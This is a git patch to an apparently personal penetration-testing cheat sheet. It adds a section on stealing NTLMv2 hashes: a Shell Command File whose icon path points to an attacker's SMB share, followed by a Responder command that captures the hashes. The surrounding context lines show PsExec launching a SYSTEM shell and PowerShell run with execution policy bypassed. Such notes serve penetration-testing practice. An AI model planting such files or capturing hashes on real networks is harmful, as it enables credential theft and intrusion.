From 4dfed10dec1e9d284dcf9f98667c486c251c2f4c Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Mon, 4 Oct 2021 02:38:11 +0500
Subject: [PATCH] Update Cheat Sheet.md

---
 Cheat Sheet.md | 18 +++++++++++++++++-
 1 file changed, 17 insertions(+), 1 deletion(-)

diff --git a/Cheat Sheet.md b/Cheat Sheet.md
index 20731f4..fd7647a 100644
--- a/Cheat Sheet.md	
+++ b/Cheat Sheet.md	
@@ -362,7 +362,23 @@ If the system has `PsExec.exe` open elevated cmd
 
 `.\PsExec.exe -i -s cmd.exe`
 
-### Active Directory
+### Forced authentication (Stealing Hahses)
+
+If we have access to upload files , we can upload SCF (Shell Command File) in which we can specify our IP and share so that when it makes a request to it , it's going to authenticate to our share with credentials
+
+```
+[Shell]
+Command=2
+IconFile=\\IP\share\test.ico
+[Taskbar]
+Command=ToggleDesktop
+```
+
+Then launch responder to capture the NTLMv2 hash
+
+`responder -i tun0`
+
+## Active Directory
 
 `powershell -ep bypass`  load a powershell shell with execution policy bypassed <br/>
 `. .\PowerView.ps1`      import the PowerView module